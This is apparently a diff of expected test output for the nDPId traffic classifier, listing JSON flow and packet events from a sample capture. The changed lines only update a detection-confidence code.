00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUIAAAERlcbAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} -01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} -01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} +01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} +01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 